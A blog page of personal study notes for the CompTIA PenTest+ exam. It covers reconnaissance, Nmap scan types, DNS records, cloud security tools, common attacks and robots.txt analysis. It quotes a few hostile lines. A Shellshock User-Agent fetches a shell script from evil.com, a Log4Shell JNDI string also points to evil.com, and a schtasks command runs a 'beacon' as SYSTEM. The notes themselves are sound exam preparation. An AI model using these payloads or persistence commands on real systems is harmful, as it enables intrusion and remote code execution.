animated globe back

pentest + notes

i am currently preparing to take the pentest plus exam soon & want to share my notes.

General Notes:

  • the primary focus during lateral movement in a penetration test, particularly when using CrackMapExec to leverage credentials obtained to move to other machines within the network.

  • nslookup is used to query the Domain Name System to obtain the mapping between a domain name and IP address. using set type=ns tells nslookup only reports information on name servers. (using set type=mx you would only receive information about mail exchange (MX) servers

  • Modbus used in ICS is often targeted in attacks that manipulate registers otherwise known as Register Manipulation

  • SNMP scan can provide lot of details on devices on a network, SNMP also uses community strings as a basic authentication mechanism before allowing access. with this information, we can identify an SNMP Exploit taking place.

  • if you are running WinRM to run commands to another remote windows host with WinRM enabled, you would use winrs -r:target-ip to run commands on the remote machine.
    • net use \\target-ip\\C$ /user:Administrator is for connecting to shared resouces using SMB
    • psexec \\target-ip cmd.exe would be for using PsExec to execute commands remotely
    • ssh Administrator@target-ip is an SSH command, which is not used for WinRM
  • a URL Filter would be used to block a website based on its website address or URL, it isnt a containment technique but a blocking and filtering technique.
    • Quarantine would be used against an infected machine, and it would not be effective against trying to block access to a given website across the entire organization.
    • An application blocklist is used to prevent an application from running, so this cannot be used to block a single malicious or suspicious website or URL.
  • Tenable Nessus is an excellent choice for Vulnerability Management as it integrates well with existing processes, provides automated updates, and offers detailed risk insights.
    • Open VAS is also a vulnerability scanner but lacks the extensive integration and management features of Nessus.
  • The JetDirect protocol commonly uses SNMP protocol to interact with network printers.
    • HTTP provides web-based, and HTTPS provides secure web-based management but they are not the primary protocols used by JetDirect for monitoring.

  • systemctl stop command only halts the service in its current session, it doesn’t stop it from starting on boot if it is enabled.

  • Full packet capture records the complete payload of every packet crossing the network. The other methods will not provide sufficient information to detect a cleartext password being sent.

  • Passive information gathering consists of numerous activities where the penetration tester gathers open-source or publicly available information without the organization under investigation being aware that the information has been accessed.
    • Active information gathering starts to probe the organization using DNS Enumeration, Port Scanning, and OS Fingerprinting techniques.
  • ![[file-20251119111950852.png]]

  • The rule header is set to alert only on TCP packets based on this IDS rule’s first line. The flow condition is set as “to_client,established,” which means that only inbound traffic will be analyzed against this rule and only inbound traffic for connections that are already established.

  • ![[file-20251119112246679.png]]

  • This is an example of SQL Injection

  •  An XML Schema Definition (XSD) is a recommendation that enables developers to define the structure and data types for XML documents.

  • While a malicious employee or insider could use all of the methods listed to obtain another user’s passwords, shoulder surfing is the MOST likely to be used.

  • PowerShell is the most appropriate scripting language for automating tasks on a Windows machine, including looping through IP addresses to retrieve banner information.
    • While Bash is typically used in Unix/Linux environments and Python is a versatile option that could also handle this task, PowerShell is specifically designed for automation in Windows environments.

  • Transforms are the core feature in Maltego that automates the discovery and mapping of related entities. By running transforms, you can gather additional data points like subdomains, email addresses, and other connected entities that are crucial for building a comprehensive view of the target’s infrastructure.

  •  If the scan reveals no open ports, it’s possible that the scan’s IP range was configured incorrectly, and not all targets were included.

  • Evil-WinRM is a tool primarily used for remotely executing PowerShell commands on a Windows machine with administrative privileges, which is particularly useful for post-exploitation tasks.

  •  The amass enum -passive command is designed for passive DNS enumeration, which collects data from various sources without directly interacting with the target’s servers, reducing the risk of detection.

  • You have entered the following URL, https://www.google.com/search?q=*%40diontraining.com.
    • Google interprets this statement as @diontraining.com and understands that the user is searching for email addresses since %40 is the hex code for the @ symbol.
  • Which of the following commands would he use to launch an SQL injection attack against the “id” parameter in the URL “http://target.com/product.php?id=5"?
    • The correct command uses SQLmap to test the “id” parameter for SQL injection vulnerabilities, with --dbs to enumerate databases and --level=5 for a more thorough test.

  • Google interprets this statement as @diontraining.com and understands that the user is searching for email addresses since %40 is the hex code for the @ symbol. The * is a wild card character meaning that any text could be substituted for the * in the query. This type of search would provide an attacker with a list of email addresses associated with diontraining.com

  • Radio-frequency identification (RFID) uses electromagnetic fields to automatically identify and track tags attached to objects. NFC is a subset of RFID used for short-range communication. Infrared technology is used for remote controls and certain types of wireless communication, while Bluetooth is used for exchanging data over short distances.

digital certificate reconnaissance

  • The Certificate Revocation List (CRL) is a list of digital certificates that have been revoked by a Certificate Authority (CA) before their scheduled expiration date. These certificates are no longer valid and may be checked during passive reconnaissance to identify revoked certificates.

  • The Subject Alternative Name (SAN) is a field in a digital certificate that allows a single certificate to support multiple domain names or hostnames.

  • Certificate Signing Request (CSR) is a file generated by a device or server that contains identifying information and is submitted to a CA when requesting a digital certificate.

  • Certificate Transparency (CT) Logs  are used to keep track of all SSL/TLS certificates issued by certificate authorities. By querying these logs, a penetration tester can identify all certificates that have been issued for a particular domain, including any subdomains or similar domains that could be used for phishing.

  • SQL injections target the data stored in enterprise databases by exploiting flaws in client-facing applications. These vulnerabilities being exploited are most often found in web applications.

Nmap

types of Nmap scans:

  • TCP SYN scan - identify open ports and running services while minimizing the risk of detection.

  • A TCP Connect Scan initiates a full TCP three-way handshake, making it the noisiest scan because the connection is fully established. This scan is easily detected by intrusion detection systems (IDS) and logs on the target system, making it unsuitable when attempting to minimize detection.

  • A UDP scan can be used to identify open UDP ports. However, it is generally slower and less reliable than TCP scans because it needs to wait for a timeout if there is no response from the target. Additionally, it is often noisier than SYN scans due to the number of requests made and the need to time out on each port.

  • The XMAS Tree scan sends packets with multiple flags set (FIN, URG, PSH), and if no response is received, the port is considered open. This scan is relatively stealthy, but it may not work reliably on all systems, especially modern firewalls and systems using the latest security measures.

nmap scanning techniques

  • nmap -sO(IP protocol scan) - IP protocol scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by target machines.

  • The nmap -A command is used for a comprehensive scan that includes service version detection and OS fingerprinting.

To collect detailed information, the -O option in Nmap enables OS detection, and -sV performs service version detection. Other flags like -T5 or -sU focus on speed or different scan types, but they don’t gather the required detailed data​​.

nmap scripting engine

  • Transport Layer Security (TLS) is a widely adopted security protocol designed to facilitate privacy and data security for communications over the internet. A primary use case of TLS is encrypting the communication between web applications and servers, such as web browsers loading a website. TLS was developed in 1999 as SSLv3.1, but its name was changed to separate itself from Netscape, which developed the original SSL protocol. Because of this history, the terms TLS and SSL are often used interchangeably. Secure Socket Layer uses three versions: SSLv1, SSLv2, and SSLv3. All of these versions of SSL are considered obsolete and insecure.

Cloud based tooling & Recon

know the difference in cloud security tools

  • Prowler is an AWS security assessment tool that checks for compliance with best practices and identifies potential security risks.
  • Docker Bench is used for Docker container security.
  • Kube-hunter focuses on Kubernetes.
  • ScoutSuite is a multi-cloud security auditing tool.

discovering secrets in git repos

Trivy can scan Git repositories to identify secrets like API keys, passwords, and other sensitive information that may have been committed. This makes it a versatile tool for securing containers and also code repositories. Burp Suite, Hydra, and John the Ripper are designed for web application security, brute-force attacks, and password cracking, respectively, and do not offer the same repository scanning capabilities.

know what an XSD project file is

An XML Schema Definition (XSD) is a recommendation that enables developers to define the structure and data types for XML documents. If the company provides this support resource to you, you will know the exact format expected by the application, which can save you a lot of time, and the organization a lot of expense during the assessment. Since this scenario stated that this was a known-environment assessment, it would be acceptable to ask for the penetration tester to ask for the organization’s XSD document as a support resource.

Attack types

side channel attack

  • A side-channel attack involves manipulating or measuring physical properties of shared resources, such as CPU cache, to infer information about other processes running on the same hardware. In cloud environments, this can allow attackers to gain unauthorized access to sensitive data from other tenants on the same physical server.

on-path-attack

  • An on-path attack (formerly known as a man-in-the-middle attack) intercepts communications between two systems. For example, in an HTTP transaction, the target is the TCP connection between client and server. Using different techniques, the attacker splits the original TCP connection into 2 new connections, one between the client and the attacker and the other between the attacker and the server. This often uses IP spoofing to trick a victim into connecting to the attack.

Cross site scripting attack (XSS)

If your website’s HTML code does not perform input validation to remove scripts that may be entered by a user, then an attacker can create a popup window that collects passwords and uses that information to compromise other accounts further. Tools like BeEF are used to accomplish this.

BeEF - BeEF (Browser Exploitation Framework) is a penetration testing tool included with Kali Linux that focuses on web browsers. BeEF can be used for XSS and injection attacks against a website.

Cross site request forgery (CSRF)

A cross-site request forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. A CSRF would allow an attack to induce a victim to perform actions they do not intend to perform. A rootkit is a set of software tools that enable an unauthorized user to control a computer system without being detected.

FTP CANNOT be used to conduct a banner grab.

A cybersecurity analyst or penetration tester uses a banner grab to gain information about a computer system on a network and the services running on its open ports. Administrators can use this to take inventory of the systems and services on their network. This is commonly done using telnet, wget, or netcat.

Hunter.io - email reconnaissance

The Finder with Filters in Hunter.io enables you to narrow down search results based on specific criteria, such as job title or department, helping you target emails from particular roles within an organization.

  • Domain Search provides general email addresses.
  • Bulk Email Finder is for multiple searches.
  • Email Verifier checks the validity of individual emails.

WSDL vs Swagger

WSDL is a machine-readable XML file for SOAP services, while Swagger (now the OpenAPI Specification) is a human-readable specification for REST APIs

Swagger = Rest API **WSDL = SOAP **

scheduled tasks

A scheduled task or scheduled job is an instance of execution, like initiating a process or running a script, that the system performs on a set schedule. Once the task executes, it can prompt the user for interaction or run silently in the background; it all depends on what the task is set up to do. Scheduled tasks in Windows use the schtasks command. The correct answer for this persistence is to enter the command “schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM” that will create a task called “beacon” that runs the script at “C:\temp\beacon.bat every 20 minutes as the SYSTEM level user.

tcpdump commands

  • tcpdump command to capture only HTTP GET requests on interface eth0 is tcpdump -i eth0 "tcp port 80 and tcp[32:4] = 0x47455420”. This command filters packets to capture only those on port 80 (HTTP) where the TCP payload begins with “GET” (0x47455420 in hex)

bash

The most efficient and reliable way to compare the contents of two files in Bash is by using cmp -s file1 file2. This command performs a byte-by-byte comparison, exits immediately upon finding a difference, and works with both text and binary files—making it ideal for scripting tasks where speed and accuracy are important.

Authentication Attacks

  • Pass-the-token attack, an attacker uses intercepted authentication IDs/tokens to impersonate a user without needing their password.
  • Pass-the-hash and Pass-the-ticket attacks use different types of credentials.
  • Brute force attack attempts to guess the password through repeated attempts.

DNS Record types

  • Service Records (SV) - are used to provide host and port information on services such as voice over IP (VoIP) and instant messaging (IM) applications.
  • Mail Exchange (MX) records - are used to provide the mail server that accepts email messages for a particular domain.
  • Nameserver (NS) records - are used to list the authoritative DNS server for a particular domain.
  • Text Records (TXT) - are used to provide information about a resource such as a server, network, or service in human-readable form. They often contain domain verification and domain authentications for third-party tools that can send information on behalf of a domain name.

Enumeration tools

enum4linux - It is specifically designed to enumerate information from Windows systems, such as user accounts, shared resources, and password policies. tcpdump - is used for packet capturing netcat - is a network utility for reading from and writing to network connections traceroute -  is used for tracing the route packets take to a network host

Risk Assessment Types

  • qualitative risk assessment - it categorizes things based on the likelihood and impact of a given incident using non-numerical terms, such as high, medium, and low.
  • quantitative risk - If the risk assessment provided exact numbers or percentages of risk, then it would be a quantitative risk assessment.

Robots.txt & User-Agent Analysis for PenTest+

1. Understanding robots.txt

What You Saw in the robots.txt File

User-agent: *
Disallow: /admin
Disallow: /wpadmin
Disallow: /backup
Disallow: /config
Disallow: /.git
Disallow: /api/v1/
Disallow: /test

Why This Matters

These entries reveal hidden or sensitive directories useful during pentesting.

2. Purpose of robots.txt

Intended Purpose

  • Tell search engine crawlers which paths not to index.

Actual Security Impact

  • Reveals hidden directory structures.
  • Leads attackers directly to sensitive areas.

3. High-Risk Directories in robots.txt

Admin Panels

Disallow: /admin
Disallow: /administrator
Disallow: /wpadmin
Disallow: /wp-admin
Disallow: /cpanel
Disallow: /manager

Sensitive Data

Disallow: /backup
Disallow: /backups
Disallow: /db
Disallow: /sql
Disallow: /config
Disallow: /.env

Version Control Repositories

Disallow: /.git
Disallow: /.svn
Disallow: /.hg

API Endpoints

Disallow: /api/
Disallow: /api/v1/
Disallow: /api/v2/
Disallow: /graphql

Development / Test Environments

Disallow: /dev
Disallow: /test
Disallow: /staging
Disallow: /demo
Disallow: /tmp

4. Why These Entries Matter During Pentesting

1. Information Disclosure

curl http://target.com/admin
wget -r http://target.com/.git/

2. Hidden Functionality Discovery

Disallow: /api/v1/users
Disallow: /api/v1/admin
Disallow: /debug
Disallow: /phpinfo.php

5. User-Agent Entries in robots.txt

Legitimate Examples

User-agent: Googlebot
Disallow: /private/

User-agent: *
Disallow: /admin/

Suspicious User-Agent Rules

User-agent: totally-not-a-scanner
Disallow: /honeypot/

User-agent: sqlmap
Disallow: /

User-agent: nmap
Disallow: /

User-agent: nikto
Disallow: /

6. User-Agent in Other Contexts

Typical Browser Activity

GET / HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

Malicious Indicators in Logs

User-Agent: sqlmap/1.4.7
User-Agent: Nikto/2.1.6
User-Agent: Nessus/8.13.1

# Shellshock
User-Agent: () { :; }; /bin/bash -c "wget http://evil.com/shell.sh"

# Log4Shell
User-Agent: ${jndi:ldap://evil.com/a}

7. Pentesting Workflow with robots.txt

Step 1: Retrieve robots.txt

curl http://target.com/robots.txt
wget http://target.com/robots.txt

Step 2: Enumerate Disallowed Directories

curl http://target.com/backup/
curl http://target.com/backup.zip
curl http://target.com/backup.tar.gz
curl http://target.com/backup/database.sql

Step 3: Use Automated Tools

nikto -h http://target.com
gobuster dir -u http://target.com -w robots-disallowed.txt

8. Common Exam Scenarios

Scenario 1

User-agent: *
Disallow: /admin
Disallow: /.git
Disallow: /backup
Disallow: /api/keys

Investigate first: /.git or /api/keys

Scenario 2

Entry suggesting WordPress: /wp-admin

9. Quick Reference — Suspicious robots.txt Entries

Entry Why It Matters
/admin, /administrator Admin login panels
/wp-admin, /wpadmin WordPress admin
/.git, /.svn Source code disclosure
/backup, /backups Backup file exposure
/api/, /api/v1/ API endpoints
/config, /.env Configuration + secrets
/test, /dev Development content
/phpmyadmin Database interface
/.htaccess, /.htpasswd Apache config